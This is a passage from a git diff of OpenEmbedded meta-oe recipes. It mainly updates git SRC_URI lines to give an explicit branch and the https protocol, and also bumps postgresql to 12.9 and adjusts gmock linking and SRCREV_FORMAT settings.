#------------------------------- +@@ -87,11 +105,11 @@ include_directories(${CMAKE_CURRENT_SOURCE_DIR}) + + add_executable(sdbus-c++-unit-tests ${UNITTESTS_SRCS}) + target_compile_definitions(sdbus-c++-unit-tests PRIVATE LIBSYSTEMD_VERSION=${LIBSYSTEMD_VERSION}) +-target_link_libraries(sdbus-c++-unit-tests sdbus-c++-objlib gmock gmock_main) ++target_link_libraries(sdbus-c++-unit-tests sdbus-c++-objlib GTest::gmock) + + add_executable(sdbus-c++-integration-tests ${INTEGRATIONTESTS_SRCS}) + target_compile_definitions(sdbus-c++-integration-tests PRIVATE LIBSYSTEMD_VERSION=${LIBSYSTEMD_VERSION}) +-target_link_libraries(sdbus-c++-integration-tests sdbus-c++ gmock gmock_main) ++target_link_libraries(sdbus-c++-integration-tests sdbus-c++ GTest::gmock) + + # Manual performance and stress tests + option(ENABLE_PERF_TESTS "Build and install manual performance tests (default OFF)" OFF) diff --git a/meta-openembedded/meta-oe/recipes-core/sdbus-c++/sdbus-c++-libsystemd_243.bb b/meta-openembedded/meta-oe/recipes-core/sdbus-c++/sdbus-c++-libsystemd_243.bb index c8e81a4123..f0e928d0da 100644 --- a/meta-openembedded/meta-oe/recipes-core/sdbus-c++/sdbus-c++-libsystemd_243.bb +++ b/meta-openembedded/meta-oe/recipes-core/sdbus-c++/sdbus-c++-libsystemd_243.bb @@ -12,7 +12,7 @@ DEPENDS += "gperf-native gettext-native util-linux libcap" SRCREV = "efb536d0cbe2e58f80e501d19999928c75e08f6a" SRCBRANCH = "v243-stable" -SRC_URI = "git://github.com/systemd/systemd-stable.git;protocol=git;branch=${SRCBRANCH}" +SRC_URI = "git://github.com/systemd/systemd-stable.git;protocol=https;branch=${SRCBRANCH}" SRC_URI += "file://static-libsystemd-pkgconfig.patch" diff --git a/meta-openembedded/meta-oe/recipes-core/sdbus-c++/sdbus-c++_0.8.1.bb b/meta-openembedded/meta-oe/recipes-core/sdbus-c++/sdbus-c++_0.8.1.bb index c4d63fd272..a94fb8deff 100644 --- a/meta-openembedded/meta-oe/recipes-core/sdbus-c++/sdbus-c++_0.8.1.bb +++ b/meta-openembedded/meta-oe/recipes-core/sdbus-c++/sdbus-c++_0.8.1.bb @@ -12,13 +12,16 @@ PACKAGECONFIG ??= "${@bb.utils.contains('DISTRO_FEATURES', 'systemd', 'with-exte ${@bb.utils.contains('PTEST_ENABLED', '1', 'with-tests', '', d)}" PACKAGECONFIG[with-builtin-libsystemd] = ",,sdbus-c++-libsystemd,libcap" PACKAGECONFIG[with-external-libsystemd] = ",,systemd,libsystemd" -PACKAGECONFIG[with-tests] = "-DBUILD_TESTS=ON -DTESTS_INSTALL_PATH=${libdir}/${BPN}/tests,-DBUILD_TESTS=OFF" +PACKAGECONFIG[with-tests] = "-DBUILD_TESTS=ON -DTESTS_INSTALL_PATH=${libdir}/${BPN}/tests,-DBUILD_TESTS=OFF,googletest gmock" DEPENDS += "expat" SRCREV = "3a4f343fb924650e7639660efa5f143961162044" -SRC_URI = "git://github.com/Kistler-Group/sdbus-cpp.git;protocol=https;branch=master" -SRC_URI += "file://run-ptest" + +SRC_URI = "git://github.com/Kistler-Group/sdbus-cpp.git;protocol=https;branch=master \ + file://0001-Try-to-first-find-googletest-in-the-system-before-do.patch \ + file://run-ptest \ +" EXTRA_OECMAKE = "-DBUILD_CODE_GEN=ON \ -DBUILD_DOC=ON \ diff --git a/meta-openembedded/meta-oe/recipes-crypto/libkcapi/libkcapi_git.bb b/meta-openembedded/meta-oe/recipes-crypto/libkcapi/libkcapi_git.bb index 4e217a351d..ad5355ea64 100644 --- a/meta-openembedded/meta-oe/recipes-crypto/libkcapi/libkcapi_git.bb +++ b/meta-openembedded/meta-oe/recipes-crypto/libkcapi/libkcapi_git.bb @@ -9,7 +9,7 @@ S = "${WORKDIR}/git" SRCREV = "5649050d201856bf06c8738b5d2aa1710c86ac2f" PV = "1.1.5" SRC_URI = " \ - git://github.com/smuellerDD/libkcapi.git \ + git://github.com/smuellerDD/libkcapi.git;branch=master;protocol=https \ file://0001-kcapi-kdf-Move-code-to-fix.patch \ file://0001-Use-__builtin_bswap32-on-Clang-if-supported.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-crypto/pkcs11-helper/pkcs11-helper_1.26.bb b/meta-openembedded/meta-oe/recipes-crypto/pkcs11-helper/pkcs11-helper_1.26.bb index 9b6e7ccbe2..321aa4fdc1 100644 --- a/meta-openembedded/meta-oe/recipes-crypto/pkcs11-helper/pkcs11-helper_1.26.bb +++ b/meta-openembedded/meta-oe/recipes-crypto/pkcs11-helper/pkcs11-helper_1.26.bb @@ -15,7 +15,7 @@ LIC_FILES_CHKSUM = " \ file://COPYING.GPL;md5=8a71d0475d08eee76d8b6d0c6dbec543 \ file://COPYING.BSD;md5=66b7a37c3c10483c1fd86007726104d7 \ " -SRC_URI = "git://github.com/OpenSC/${BPN}.git" +SRC_URI = "git://github.com/OpenSC/${BPN}.git;branch=master;protocol=https" S = "${WORKDIR}/git" # v1.26 diff --git a/meta-openembedded/meta-oe/recipes-dbs/leveldb/leveldb_1.22.bb b/meta-openembedded/meta-oe/recipes-dbs/leveldb/leveldb_1.22.bb index b597ef1ea8..bfc19ed150 100644 --- a/meta-openembedded/meta-oe/recipes-dbs/leveldb/leveldb_1.22.bb +++ b/meta-openembedded/meta-oe/recipes-dbs/leveldb/leveldb_1.22.bb @@ -4,7 +4,7 @@ HOMEPAGE = "https://github.com/google/leveldb" LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://LICENSE;md5=92d1b128950b11ba8495b64938fc164d" -SRC_URI = "git://github.com/google/${BPN}.git \ +SRC_URI = "git://github.com/google/${BPN}.git;branch=master;protocol=https \ file://run-ptest" SRCREV = "78b39d68c15ba020c0d60a3906fb66dbf1697595" diff --git a/meta-openembedded/meta-oe/recipes-dbs/postgresql/files/0001-Add-support-for-RISC-V.patch b/meta-openembedded/meta-oe/recipes-dbs/postgresql/files/0001-Add-support-for-RISC-V.patch index 865ad3287b..a1f5b2a7b4 100644 --- a/meta-openembedded/meta-oe/recipes-dbs/postgresql/files/0001-Add-support-for-RISC-V.patch +++ b/meta-openembedded/meta-oe/recipes-dbs/postgresql/files/0001-Add-support-for-RISC-V.patch @@ -13,7 +13,7 @@ diff --git a/src/include/storage/s_lock.h b/src/include/storage/s_lock.h index 3fe29ce..7cd578f 100644 --- a/src/include/storage/s_lock.h +++ b/src/include/storage/s_lock.h -@@ -316,11 +316,12 @@ tas(volatile slock_t *lock) +@@ -317,11 +317,12 @@ tas(volatile slock_t *lock) /* * On ARM and ARM64, we use __sync_lock_test_and_set(int *, int) if available. @@ -27,7 +27,7 @@ index 3fe29ce..7cd578f 100644 #ifdef HAVE_GCC__SYNC_INT32_TAS #define HAS_TEST_AND_SET -@@ -337,7 +338,7 @@ tas(volatile slock_t *lock) +@@ -338,7 +339,7 @@ tas(volatile slock_t *lock) #define S_UNLOCK(lock) __sync_lock_release(lock) #endif /* HAVE_GCC__SYNC_INT32_TAS */ @@ -35,7 +35,7 @@ index 3fe29ce..7cd578f 100644 +#endif /* __arm__ || __arm || __aarch64__ || __aarch64 || __riscv */ - /* S/390 and S/390x Linux (32- and 64-bit zSeries) */ + /* -- 2.9.3 diff --git a/meta-openembedded/meta-oe/recipes-dbs/postgresql/postgresql_12.7.bb b/meta-openembedded/meta-oe/recipes-dbs/postgresql/postgresql_12.7.bb deleted file mode 100644 index 18ba2178f4..0000000000 --- a/meta-openembedded/meta-oe/recipes-dbs/postgresql/postgresql_12.7.bb +++ /dev/null @@ -1,11 +0,0 @@ -require postgresql.inc - -LIC_FILES_CHKSUM = "file://COPYRIGHT;md5=255f15687738db8068fbe9b938c90217" - -SRC_URI += "\ - file://not-check-libperl.patch \ - file://0001-Add-support-for-RISC-V.patch \ - file://0001-Improve-reproducibility.patch \ -" - -SRC_URI[sha256sum] = "8490741f47c88edc8b6624af009ce19fda4dc9b31c4469ce2551d84075d5d995" diff --git a/meta-openembedded/meta-oe/recipes-dbs/postgresql/postgresql_12.9.bb b/meta-openembedded/meta-oe/recipes-dbs/postgresql/postgresql_12.9.bb new file mode 100644 index 0000000000..b4c23ced24 --- /dev/null +++ b/meta-openembedded/meta-oe/recipes-dbs/postgresql/postgresql_12.9.bb @@ -0,0 +1,11 @@ +require postgresql.inc + +LIC_FILES_CHKSUM = "file://COPYRIGHT;md5=255f15687738db8068fbe9b938c90217" + +SRC_URI += "\ + file://not-check-libperl.patch \ + file://0001-Add-support-for-RISC-V.patch \ + file://0001-Improve-reproducibility.patch \ +" + +SRC_URI[sha256sum] = "89fda2de33ed04a98548e43f3ee5f15b882be17505d631fe0dd1a540a2b56dce" diff --git a/meta-openembedded/meta-oe/recipes-dbs/rocksdb/rocksdb_git.bb b/meta-openembedded/meta-oe/recipes-dbs/rocksdb/rocksdb_git.bb index b9038df81d..f971319915 100644 --- a/meta-openembedded/meta-oe/recipes-dbs/rocksdb/rocksdb_git.bb +++ b/meta-openembedded/meta-oe/recipes-dbs/rocksdb/rocksdb_git.bb @@ -10,7 +10,7 @@ SRCREV = "551a110918493a19d11243f53408b97485de1411" SRCBRANCH = "6.6.fb" PV = "6.6.4" -SRC_URI = "git://github.com/facebook/${BPN}.git;branch=${SRCBRANCH} \ +SRC_URI = "git://github.com/facebook/${BPN}.git;branch=${SRCBRANCH};protocol=https \ file://0001-db-write_thread.cc-Initialize-state.patch \ file://0001-cmake-Add-check-for-atomic-support.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-devtools/abseil-cpp/abseil-cpp_git.bb b/meta-openembedded/meta-oe/recipes-devtools/abseil-cpp/abseil-cpp_git.bb index e874e4a5ea..87f9c23ebf 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/abseil-cpp/abseil-cpp_git.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/abseil-cpp/abseil-cpp_git.bb @@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=df52c6edb7adc22e533b2bacc3bd3915" PV = "20190808+git${SRCPV}" SRCREV = "aa844899c937bde5d2b24f276b59997e5b668bde" BRANCH = "lts_2019_08_08" -SRC_URI = "git://github.com/abseil/abseil-cpp;branch=${BRANCH} \ +SRC_URI = "git://github.com/abseil/abseil-cpp;branch=${BRANCH};protocol=https \ file://0001-Remove-maes-option-from-cross-compilation.patch \ file://0002-Add-forgotten-ABSL_HAVE_VDSO_SUPPORT-conditional.patch \ file://0003-Add-fPIC-option.patch \ diff --git a/meta-openembedded/meta-oe/recipes-devtools/android-tools/android-tools_5.1.1.r37.bb b/meta-openembedded/meta-oe/recipes-devtools/android-tools/android-tools_5.1.1.r37.bb index fb6125e2a5..ef440471bf 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/android-tools/android-tools_5.1.1.r37.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/android-tools/android-tools_5.1.1.r37.bb @@ -19,6 +19,7 @@ SRCREV_libhardware = "be55eb1f4d840c82ffaf7c47460df17ff5bc4d9b" SRCREV_libselinux = "07e9e1339ad1ba608acfba9dce2d0f474b252feb" SRCREV_build = "16e987def3d7d8f7d30805eb95cef69e52a87dbc" +SRCREV_FORMAT = "core_extras_libhardware_libselinux_build" SRC_URI = " \ git://${ANDROID_MIRROR}/platform/system/core;name=core;protocol=https;nobranch=1;destsuffix=git/system/core \ git://${ANDROID_MIRROR}/platform/system/extras;name=extras;protocol=https;nobranch=1;destsuffix=git/system/extras \ diff --git a/meta-openembedded/meta-oe/recipes-devtools/bootchart/bootchart_git.bb b/meta-openembedded/meta-oe/recipes-devtools/bootchart/bootchart_git.bb index 2b75eaac9d..79754050d0 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/bootchart/bootchart_git.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/bootchart/bootchart_git.bb @@ -8,7 +8,7 @@ PV = "1.17" PR = "r1" PE = "1" -SRC_URI = "git://gitorious.org/meego-developer-tools/bootchart.git;protocol=https \ +SRC_URI = "git://gitorious.org/meego-developer-tools/bootchart.git;protocol=https;branch=master \ file://0001-svg-add-rudimentary-support-for-ARM-cpuinfo.patch \ file://0002-svg-open-etc-os-release-and-use-PRETTY_NAME-for-the-.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-devtools/breakpad/breakpad_git.bb b/meta-openembedded/meta-oe/recipes-devtools/breakpad/breakpad_git.bb index daf262ed66..cbeb99316e 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/breakpad/breakpad_git.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/breakpad/breakpad_git.bb @@ -26,11 +26,11 @@ SRCREV_protobuf = "cb6dd4ef5f82e41e06179dcd57d3b1d9246ad6ac" SRCREV_lss = "8048ece6c16c91acfe0d36d1d3cc0890ab6e945c" SRCREV_gyp = "324dd166b7c0b39d513026fa52d6280ac6d56770" -SRC_URI = "git://github.com/google/breakpad;name=breakpad \ - git://github.com/google/googletest.git;destsuffix=git/src/testing/gtest;name=gtest \ - git://github.com/google/protobuf.git;destsuffix=git/src/third_party/protobuf/protobuf;name=protobuf \ - git://chromium.googlesource.com/linux-syscall-support;protocol=https;destsuffix=git/src/third_party/lss;name=lss \ - git://chromium.googlesource.com/external/gyp;protocol=https;destsuffix=git/src/tools/gyp;name=gyp \ +SRC_URI = "git://github.com/google/breakpad;name=breakpad;branch=master;protocol=https \ + git://github.com/google/googletest.git;destsuffix=git/src/testing/gtest;name=gtest;branch=master;protocol=https \ + git://github.com/google/protobuf.git;destsuffix=git/src/third_party/protobuf/protobuf;name=protobuf;branch=master;protocol=https \ + git://chromium.googlesource.com/linux-syscall-support;protocol=https;destsuffix=git/src/third_party/lss;name=lss;branch=master \ + git://chromium.googlesource.com/external/gyp;protocol=https;destsuffix=git/src/tools/gyp;name=gyp;branch=master \ file://0001-include-sys-reg.h-to-get-__WORDSIZE-on-musl-libc.patch \ file://0003-Fix-conflict-between-musl-libc-dirent.h-and-lss.patch \ file://0001-Turn-off-sign-compare-for-musl-libc.patch \ diff --git a/meta-openembedded/meta-oe/recipes-devtools/capnproto/capnproto_0.7.0.bb b/meta-openembedded/meta-oe/recipes-devtools/capnproto/capnproto_0.7.0.bb index c6bab5ec2b..cb748d3cb6 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/capnproto/capnproto_0.7.0.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/capnproto/capnproto_0.7.0.bb @@ -5,7 +5,7 @@ SECTION = "console/tools" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://../LICENSE;md5=a05663ae6cca874123bf667a60dca8c9" -SRC_URI = "git://github.com/sandstorm-io/capnproto.git;branch=release-${PV}" +SRC_URI = "git://github.com/sandstorm-io/capnproto.git;branch=release-${PV};protocol=https" SRCREV = "3f44c6db0f0f6c0cab0633f15f15d0a2acd01d19" S = "${WORKDIR}/git/c++" diff --git a/meta-openembedded/meta-oe/recipes-devtools/cjson/cjson_1.7.13.bb b/meta-openembedded/meta-oe/recipes-devtools/cjson/cjson_1.7.13.bb index e6174821ff..7af05acf9a 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/cjson/cjson_1.7.13.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/cjson/cjson_1.7.13.bb @@ -5,7 +5,7 @@ SECTION = "libs" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://LICENSE;md5=218947f77e8cb8e2fa02918dc41c50d0" -SRC_URI = "git://github.com/DaveGamble/cJSON.git" +SRC_URI = "git://github.com/DaveGamble/cJSON.git;branch=master;protocol=https" SRCREV = "39853e5148dad8dc5d32ea2b00943cf4a0c6f120" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-devtools/concurrencykit/concurrencykit_git.bb b/meta-openembedded/meta-oe/recipes-devtools/concurrencykit/concurrencykit_git.bb index 8c6cf7db20..996314a758 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/concurrencykit/concurrencykit_git.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/concurrencykit/concurrencykit_git.bb @@ -10,7 +10,7 @@ SECTION = "base" PV = "0.5.1+git${SRCPV}" SRCREV = "f97d3da5c375ac2fc5a9173cdd36cb828915a2e1" LIC_FILES_CHKSUM = "file://LICENSE;md5=a0b24c1a8f9ad516a297d055b0294231" -SRC_URI = "git://github.com/concurrencykit/ck.git \ +SRC_URI = "git://github.com/concurrencykit/ck.git;branch=master;protocol=https \ file://cross.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-devtools/dnf-plugin-tui/dnf-plugin-tui_git.bb b/meta-openembedded/meta-oe/recipes-devtools/dnf-plugin-tui/dnf-plugin-tui_git.bb index 406494ebbc..db7a8d7933 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/dnf-plugin-tui/dnf-plugin-tui_git.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/dnf-plugin-tui/dnf-plugin-tui_git.bb @@ -3,7 +3,7 @@ LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" -SRC_URI = "git://github.com/ubinux/dnf-plugin-tui.git;branch=master " +SRC_URI = "git://github.com/ubinux/dnf-plugin-tui.git;branch=master;protocol=https" SRCREV = "c5416adeb210154dc4ccc4c3e1c5297d83ebd41e" PV = "1.1" diff --git a/meta-openembedded/meta-oe/recipes-devtools/flatbuffers/flatbuffers_1.12.0.bb b/meta-openembedded/meta-oe/recipes-devtools/flatbuffers/flatbuffers_1.12.0.bb index 7b8d47d8df..859d6a0b05 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/flatbuffers/flatbuffers_1.12.0.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/flatbuffers/flatbuffers_1.12.0.bb @@ -12,7 +12,7 @@ LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=3b83ef96387f14655fc854ddc3c6bd57" SRCREV = "6df40a2471737b27271bdd9b900ab5f3aec746c7" -SRC_URI = "git://github.com/google/flatbuffers.git" +SRC_URI = "git://github.com/google/flatbuffers.git;branch=master;protocol=https" # affects only flatbuffers rust crate CVE_CHECK_WHITELIST += "CVE-2020-35864" diff --git a/meta-openembedded/meta-oe/recipes-devtools/grpc/grpc_1.24.3.bb b/meta-openembedded/meta-oe/recipes-devtools/grpc/grpc_1.24.3.bb index 752562eb33..fa4cbd0b47 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/grpc/grpc_1.24.3.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/grpc/grpc_1.24.3.bb @@ -15,9 +15,10 @@ SRCREV_grpc = "2de2e8dd8921e1f7d043e01faf7fe8a291fbb072" SRCREV_upb = "9effcbcb27f0a665f9f345030188c0b291e32482" BRANCH = "v1.24.x" SRC_URI = "git://github.com/grpc/grpc.git;protocol=https;name=grpc;branch=${BRANCH} \ - git://github.com/protocolbuffers/upb;name=upb;destsuffix=git/third_party/upb \ + git://github.com/protocolbuffers/upb;name=upb;destsuffix=git/third_party/upb;branch=master;protocol=https \ file://0001-CMakeLists.txt-Fix-libraries-installation-for-Linux.patch \ " +SRCREV_FORMAT = "grpc_upb" SRC_URI_append_class-target = " file://0001-CMakeLists.txt-Fix-grpc_cpp_plugin-path-during-cross.patch \ " SRC_URI_append_class-nativesdk = " file://0001-CMakeLists.txt-Fix-grpc_cpp_plugin-path-during-cross.patch" diff --git a/meta-openembedded/meta-oe/recipes-devtools/guider/guider_3.9.7.bb b/meta-openembedded/meta-oe/recipes-devtools/guider/guider_3.9.7.bb index 88fad936ba..cc81443d5d 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/guider/guider_3.9.7.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/guider/guider_3.9.7.bb @@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=2c1c00f9d3ed9e24fa69b932b7e7aff2" PV = "3.9.7+git${SRCPV}" -SRC_URI = "git://github.com/iipeace/${BPN}" +SRC_URI = "git://github.com/iipeace/${BPN};branch=master;protocol=https" SRCREV = "459b5189a46023fc98e19888b196bdc2674022fd" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-devtools/jsoncpp/jsoncpp_1.9.2.bb b/meta-openembedded/meta-oe/recipes-devtools/jsoncpp/jsoncpp_1.9.2.bb index 8a5db3da3c..629881f0cf 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/jsoncpp/jsoncpp_1.9.2.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/jsoncpp/jsoncpp_1.9.2.bb @@ -14,7 +14,7 @@ LICENSE = "MIT" LIC_FILES_CHKSUM = "file://LICENSE;md5=fa2a23dd1dc6c139f35105379d76df2b" SRCREV = "d2e6a971f4544c55b8e3b25cf96db266971b778f" -SRC_URI = "git://github.com/open-source-parsers/jsoncpp" +SRC_URI = "git://github.com/open-source-parsers/jsoncpp;branch=master;protocol=https" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-devtools/jsonrpc/jsonrpc_1.3.0.bb b/meta-openembedded/meta-oe/recipes-devtools/jsonrpc/jsonrpc_1.3.0.bb index ca9675ed64..e9672ea4dd 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/jsonrpc/jsonrpc_1.3.0.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/jsonrpc/jsonrpc_1.3.0.bb @@ -9,7 +9,7 @@ SECTION = "libs" DEPENDS = "curl jsoncpp libmicrohttpd hiredis" -SRC_URI = "git://github.com/cinemast/libjson-rpc-cpp" +SRC_URI = "git://github.com/cinemast/libjson-rpc-cpp;branch=master;protocol=https" SRCREV = "c696f6932113b81cd20cd4a34fdb1808e773f23e" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-devtools/lapack/lapack_3.9.0.bb b/meta-openembedded/meta-oe/recipes-devtools/lapack/lapack_3.9.0.bb index 62d4df5e09..72f06ae44f 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/lapack/lapack_3.9.0.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/lapack/lapack_3.9.0.bb @@ -14,7 +14,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=930f8aa500a47c7dab0f8efb5a1c9a40" DEPENDS = "libgfortran" SRCREV = "6acc99d5f39130be7cec00fb835606042101a970" -SRC_URI = "git://github.com/Reference-LAPACK/lapack.git;protocol=https" +SRC_URI = "git://github.com/Reference-LAPACK/lapack.git;protocol=https;branch=master" S = "${WORKDIR}/git" EXTRA_OECMAKE = " -DBUILD_SHARED_LIBS=ON " diff --git a/meta-openembedded/meta-oe/recipes-devtools/libsombok3/libsombok3_2.4.0.bb b/meta-openembedded/meta-oe/recipes-devtools/libsombok3/libsombok3_2.4.0.bb index b83e86a488..2dc3776e81 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/libsombok3/libsombok3_2.4.0.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/libsombok3/libsombok3_2.4.0.bb @@ -7,7 +7,7 @@ Cluster segmentation described in Annex #29 (UAX #29)." LICENSE = "Artistic-1.0 | GPLv1+" LIC_FILES_CHKSUM = "file://COPYING;md5=5b122a36d0f6dc55279a0ebc69f3c60b" -SRC_URI = "git://github.com/hatukanezumi/sombok.git;protocol=https \ +SRC_URI = "git://github.com/hatukanezumi/sombok.git;protocol=https;branch=master \ file://0001-configure.ac-fix-cross-compiling-issue.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-devtools/libubox/libubox_git.bb b/meta-openembedded/meta-oe/recipes-devtools/libubox/libubox_git.bb index 7dbefa1152..18f26b009b 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/libubox/libubox_git.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/libubox/libubox_git.bb @@ -13,7 +13,7 @@ LIC_FILES_CHKSUM = "\ " SRC_URI = "\ - git://git.openwrt.org/project/libubox.git \ + git://git.openwrt.org/project/libubox.git;branch=master \ file://0001-version-libraries.patch \ file://fix-libdir.patch \ file://0001-blobmsg-fix-array-out-of-bounds-GCC-10-warning.patch \ diff --git a/meta-openembedded/meta-oe/recipes-devtools/ltrace/ltrace_git.bb b/meta-openembedded/meta-oe/recipes-devtools/ltrace/ltrace_git.bb index 5710943d74..339841acf3 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/ltrace/ltrace_git.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/ltrace/ltrace_git.bb @@ -14,7 +14,7 @@ PV = "7.91+git${SRCPV}" SRCREV = "c22d359433b333937ee3d803450dc41998115685" DEPENDS = "elfutils" -SRC_URI = "git://github.com/sparkleholic/ltrace.git;branch=master;protocol=http \ +SRC_URI = "git://github.com/sparkleholic/ltrace.git;branch=master;protocol=http;protocol=https \ file://configure-allow-to-disable-selinux-support.patch \ file://0001-replace-readdir_r-with-readdir.patch \ file://0001-Use-correct-enum-type.patch \ diff --git a/meta-openembedded/meta-oe/recipes-devtools/luaposix/luaposix_33.4.0.bb b/meta-openembedded/meta-oe/recipes-devtools/luaposix/luaposix_33.4.0.bb index 1bee9fe0b9..83f6aa0f42 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/luaposix/luaposix_33.4.0.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/luaposix/luaposix_33.4.0.bb @@ -5,7 +5,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=7dd2aad04bb7ca212e69127ba8d58f9f" DEPENDS += "lua-native lua" -SRC_URI = "git://github.com/luaposix/luaposix.git;branch=release \ +SRC_URI = "git://github.com/luaposix/luaposix.git;branch=release;protocol=https \ file://0001-fix-avoid-race-condition-between-test-and-mkdir.patch \ " SRCREV = "8e4902ed81c922ed8f76a7ed85be1eaa3fd7e66d" diff --git a/meta-openembedded/meta-oe/recipes-devtools/msgpack/msgpack-c_3.2.1.bb b/meta-openembedded/meta-oe/recipes-devtools/msgpack/msgpack-c_3.2.1.bb index d410dc6e0a..90b55ad2df 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/msgpack/msgpack-c_3.2.1.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/msgpack/msgpack-c_3.2.1.bb @@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://NOTICE;md5=7a858c074723608e08614061dc044352 \ PV .= "+git${SRCPV}" -SRC_URI = "git://github.com/msgpack/msgpack-c \ +SRC_URI = "git://github.com/msgpack/msgpack-c;branch=master;protocol=https \ " # cpp-3.2.1 SRCREV = "8085ab8721090a447cf98bb802d1406ad7afe420" diff --git a/meta-openembedded/meta-oe/recipes-devtools/nanopb/nanopb_0.4.0.bb b/meta-openembedded/meta-oe/recipes-devtools/nanopb/nanopb_0.4.0.bb index 21d110aeea..5b1e2dfbf7 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/nanopb/nanopb_0.4.0.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/nanopb/nanopb_0.4.0.bb @@ -4,7 +4,7 @@ LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=9db4b73a55a3994384112efcdb37c01f" DEPENDS = "protobuf-native" -SRC_URI = "git://github.com/nanopb/nanopb.git" +SRC_URI = "git://github.com/nanopb/nanopb.git;branch=master;protocol=https" SRCREV = "70f0de9877b1ce12abc0229d5df84db6349fcbfc" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-devtools/nlohmann-fifo/nlohmann-fifo_git.bb b/meta-openembedded/meta-oe/recipes-devtools/nlohmann-fifo/nlohmann-fifo_git.bb index a97eb53c1d..62fdecf6ff 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/nlohmann-fifo/nlohmann-fifo_git.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/nlohmann-fifo/nlohmann-fifo_git.bb @@ -4,7 +4,7 @@ SECTION = "libs" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://LICENSE.MIT;md5=b67209a1e36b682a8226de19d265b1e0" -SRC_URI = "git://github.com/nlohmann/fifo_map.git" +SRC_URI = "git://github.com/nlohmann/fifo_map.git;branch=master;protocol=https" PV = "1.0.0+git${SRCPV}" diff --git a/meta-openembedded/meta-oe/recipes-devtools/nlohmann-json/nlohmann-json_3.7.3.bb b/meta-openembedded/meta-oe/recipes-devtools/nlohmann-json/nlohmann-json_3.7.3.bb index 5766194d26..2749f44978 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/nlohmann-json/nlohmann-json_3.7.3.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/nlohmann-json/nlohmann-json_3.7.3.bb @@ -4,7 +4,7 @@ SECTION = "libs" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://LICENSE.MIT;md5=f5f7c71504da070bcf4f090205ce1080" -SRC_URI = "git://github.com/nlohmann/json.git;nobranch=1 \ +SRC_URI = "git://github.com/nlohmann/json.git;nobranch=1;protocol=https \ file://0001-Templatize-basic_json-ctor-from-json_ref.patch \ file://0001-typo-fix.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-devtools/openocd/openocd_git.bb b/meta-openembedded/meta-oe/recipes-devtools/openocd/openocd_git.bb index e95f1cfa54..9ff23d17af 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/openocd/openocd_git.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/openocd/openocd_git.bb @@ -5,10 +5,10 @@ DEPENDS = "libusb-compat libftdi" RDEPENDS_${PN} = "libusb1" SRC_URI = " \ - git://repo.or.cz/openocd.git;protocol=http;name=openocd \ - git://repo.or.cz/r/git2cl.git;protocol=http;destsuffix=tools/git2cl;name=git2cl \ - git://repo.or.cz/r/jimtcl.git;protocol=http;destsuffix=git/jimtcl;name=jimtcl \ - 